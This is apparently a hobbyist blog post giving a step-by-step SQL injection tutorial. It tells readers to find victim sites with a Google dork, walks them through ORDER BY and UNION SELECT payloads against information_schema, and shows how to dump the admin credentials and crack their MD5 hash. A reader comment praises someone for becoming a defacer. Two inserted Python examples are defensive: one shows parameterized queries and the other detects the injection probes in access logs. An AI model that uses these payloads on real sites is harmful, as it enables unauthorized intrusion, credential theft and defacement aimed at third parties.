Keywords you should/must know:
Characters: ', -
Comments: /*, --

INFORMATION:

  1. "information_schema" only works on MySQL version 5.x and above.
  2. "information_schema" does not work on MySQL version 4.x.xx and below.

The Google dork to use is "inurl:news.php?id="
Go to www.google.com and search for a victim site with that dork.


Step 1

[site]/news.php?id=1
--- Add a character at the end of the URL of any site to find out whether the site is vulnerable to SQL injection or not.

Example:
[site]/news.php?id=1'
or
[site]/news.php?id=-1

Example of the error that comes out:
Warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
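An added example, not code from the original tutorial: a small Python/sqlite3 stand-in for a news.php-style page that shows why a stray quote in the id produces the warning above, and the hardened form that prevents it. The table, rows, function names and the probe strings (the decoded form of the URLs used in this tutorial) are constructed for this illustration; sqlite3 raises sqlite3.Error where PHP's mysql_query() would return false and mysql_fetch_array() would print the warning.

```python
import sqlite3

# Constructed in-memory stand-in for a site's news table (not any real site's schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "First post", "hello"), (2, "Second post", "world")],
    )
    return conn

def get_news_vulnerable(conn, raw_id):
    """The pattern behind news.php?id= : the query-string value is concatenated
    straight into the SQL text, so quotes and keywords become part of the query."""
    sql = "SELECT id, title, body FROM news WHERE id=" + raw_id
    return conn.execute(sql).fetchall()

def get_news_safe(conn, raw_id):
    """Hardened form: check the type first, then bind the value as a parameter.
    The driver passes it as data, never as SQL text, so it cannot alter the statement."""
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute(
        "SELECT id, title, body FROM news WHERE id=?", (int(raw_id),)
    ).fetchall()

def handle_request(conn, raw_id):
    """What the page should send back: the rows, or a generic message.
    The raw database error (file path, line number, driver text) belongs in
    the server log, not in the response to the visitor."""
    try:
        return {"rows": get_news_safe(conn, raw_id)}
    except (ValueError, sqlite3.Error) as exc:
        log_line = "news lookup rejected id=%r: %s" % (raw_id, exc)
        return {"error": "Invalid request", "log": log_line}

# Decoded forms of the URL values typed in this tutorial (id=1', id=1+order+by+4/*, ...).
PROBES = ["1", "1'", "1 order by 3", "1 order by 4", "1 union select 1,sqlite_version(),3"]

def compare(conn):
    """Returns {probe: (outcome on the vulnerable path, outcome on the hardened path)}."""
    out = {}
    for p in PROBES:
        try:
            vuln = "rows=%d" % len(get_news_vulnerable(conn, p))
        except sqlite3.Error:
            vuln = "db error"   # the analogue of the visible mysql_fetch_array() warning
        try:
            safe = "rows=%d" % len(get_news_safe(conn, p))
        except ValueError:
            safe = "rejected"
        out[p] = (vuln, safe)
    return out

if __name__ == "__main__":
    db = make_db()
    for probe, (vuln, safe) in compare(db).items():
        print("%-40r vulnerable: %-9s hardened: %s" % (probe, vuln, safe))
```

The point of the comparison is that the hardened path never reaches the database with anything but an integer, so the error-based signal this tutorial relies on (a quote or an out-of-range ORDER BY changing the page) disappears, and the generic response from handle_request hides the file path that the original warning leaks.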

Step 2

Find how many tables are in the database.
--- Put +order+by+1-- at the end of the URL.

Example:
[site]/news.php?id=1+order+by+1--
or
[site]/news.php?id=1+order+by+1/*   Check it gradually:
[site]/news.php?id=1+order+by+2/*
[site]/news.php?id=1+order+by+3/*   until an error comes out on the page.
[site]/news.php?id=1+order+by+4/*   An error came out at number 4!
So for this tutorial, the total number of tables in the database for the site is 3.

Step 3

Use the UNION SELECT command with the number obtained in the second step to retrieve the numbers that we will use later. In the present case, the sequence runs up to three tables.

--- Command to be used: +union+select+1,2,3--
Example:
[site]/news.php?id=1+union+select+1,2,3--
The number 2 pops out on the page.

--- Then we put version() in place of the number 2,
Example:
[site]/news.php?id=1+union+select+1,version(),3--
and the version will appear on the page where the number was.

Example:
5.1.47-community-log

INFORMATION:

user() = gets the username used with the database
(Example: mae21@localhost)
database() = gets the database name
(Example: mae21_db)
version() = gets their MySQL version
(Example: 5.1.47-community-log)

Step 4

To retrieve all table names on the site, use this command:

table_name

--- Put it in place of the number (2) that came out earlier.
+from+information_schema.tables--
--- Put this at the end of the URL.

Example:
[site]/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--

Step 5

Retrieve all the table names contained in the database in one go.

group_concat(table_name)

--- Put it in place of the number (2) that came out earlier.
+from+information_schema.tables+where+table_schema=database()--
--- Put this at the end of the URL.

Example:
[site]/news.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--


Step 6

Extract the column names contained in the TABLE.

group_concat(column_name)
--- Put it in place of the number (2) that came out earlier.
+from+information_schema.columns+where+table_name=0xHEXA--
(PUT THE TABLE NAME ALREADY CONVERTED TO HEXADECIMAL)

INFORMATION:
A website can be used to convert the table name to hexadecimal.

The table we will use as the example is ADMIN.
When converted, the result is 41444D494E.
Example:
[site]/news.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x41444D494E--


Step 7

Extract the contents of the ADMIN table using the column names we obtained.

concat_ws(0x3a,"column names contained in the ADMIN table")

--- Put it in place of the number (2) that came out earlier.
+from+Admin--
--- Use the original table name.

Example:
[site]/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+admin--
And we will get the admin username and password data for the website.
The information that comes out is as follows:
"webmaster admin:8dded6912a401ad44ec9b688fd124e22"

Decrypt the MD5 hash of the information obtained at www.md5decrypter.co.uk

8dded6912a401ad44ec9b688fd124e22
= "iluvmyself" (decrypted!)

Now you have the username and password for the website.

Step 8 (Last Step)

Find the admin login page.

"Happy trying it and enjoy hacking for education..." :)
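As an added example that is not part of the original post: every probe in Steps 1 to 7 travels in the query string, so it is recorded in the web server's access log, which is where a defender can see the whole walk-through happen. This Python script parses constructed Apache-style log lines (the client addresses, timestamps and paths are made up for the example), decodes each query string, tags the markers this tutorial relies on (a stray quote, ORDER BY n, UNION SELECT, information_schema, hex literals, comment terminators, and a non-numeric value in a parameter that should be numeric), and flags a client that steps through ORDER BY 1, 2, 3, 4 as an enumeration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log, Apache combined format. Addresses, times and sizes are
# invented for this example; the query strings mirror the ones in the tutorial.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2011:10:01:02 +0800] "GET /news.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2011:10:01:09 +0800] "GET /news.php?id=1' HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2011:10:01:15 +0800] "GET /news.php?id=1+order+by+1-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2011:10:01:18 +0800] "GET /news.php?id=1+order+by+2/* HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2011:10:01:21 +0800] "GET /news.php?id=1+order+by+3/* HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2011:10:01:24 +0800] "GET /news.php?id=1+order+by+4/* HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2011:10:02:01 +0800] "GET /news.php?id=1+union+select+1,version(),3-- HTTP/1.1" 200 5130 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2011:10:03:40 +0800] "GET /news.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x41444D494E-- HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2011:10:05:00 +0800] "GET /news.php?id=2 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2011:10:05:07 +0800] "GET /news.php?id=3&page=2 HTTP/1.1" 200 4700 "-" "Mozilla/5.0"
"""

# Client address, timestamp, method, request target and status from a combined-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures are applied to the URL-decoded parameter value, so +, %20 and %27 no longer hide anything.
SIGNATURES = [
    ("quote-probe", re.compile(r"'")),
    ("order-by-enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information-schema", re.compile(r"\binformation_schema\b", re.I)),
    ("hex-literal", re.compile(r"\b0x[0-9a-f]+\b", re.I)),
    ("comment-terminator", re.compile(r"(--|/\*)\s*$")),
]

# Parameters this application only ever uses as integers (an assumption about the constructed site).
NUMERIC_PARAMS = {"id", "page"}

def analyze(log_text):
    """Returns (findings, per_ip). findings is a list of
    (ip, timestamp, decoded query, sorted tags) for each flagged request;
    per_ip summarises request counts and whether an ORDER BY enumeration was seen."""
    findings = []
    per_ip = defaultdict(lambda: {"requests": 0, "flagged": 0,
                                  "order_by_probes": 0, "enumeration": False})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-log line; skip it
        ip = m.group("ip")
        per_ip[ip]["requests"] += 1
        query = urlsplit(m.group("target")).query
        tags = set()
        decoded = []
        for name, value in parse_qsl(query, keep_blank_values=True):
            decoded.append(f"{name}={value}")
            for tag, pattern in SIGNATURES:
                if pattern.search(value):
                    tags.add(tag)
            # Structural check: a numeric parameter carrying anything but digits
            # is suspicious regardless of which SQL keywords it contains.
            if name in NUMERIC_PARAMS and not value.isdigit():
                tags.add("non-numeric-" + name)
        if tags:
            per_ip[ip]["flagged"] += 1
            if "order-by-enum" in tags:
                per_ip[ip]["order_by_probes"] += 1
            findings.append((ip, m.group("ts"), "&".join(decoded), sorted(tags)))
    # Three or more ORDER BY n requests from one client is the column-count walk in Step 2.
    for stats in per_ip.values():
        stats["enumeration"] = stats["order_by_probes"] >= 3
    return findings, dict(per_ip)

if __name__ == "__main__":
    findings, per_ip = analyze(SAMPLE_LOG)
    for ip, ts, query, tags in findings:
        print(f"{ip} [{ts}] {query}  ->  {', '.join(tags)}")
    for ip, stats in per_ip.items():
        print(f"{ip}: {stats}")
```

The non-numeric check is the one worth keeping even if the keyword signatures are tuned down: for a parameter that should only ever be an integer it has no false positives, and it catches the very first probe (the lone quote in Step 1) before any SQL keyword appears.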

2 comments

  1. hasmadi

    hmm.. this is interesting

  2. xEEx

    thanks for responding, and congratulations on having successfully become a defacer.. :)

© Copyright XAND™ | Hacking For Education 2010 - 2011. Powered by Blogger.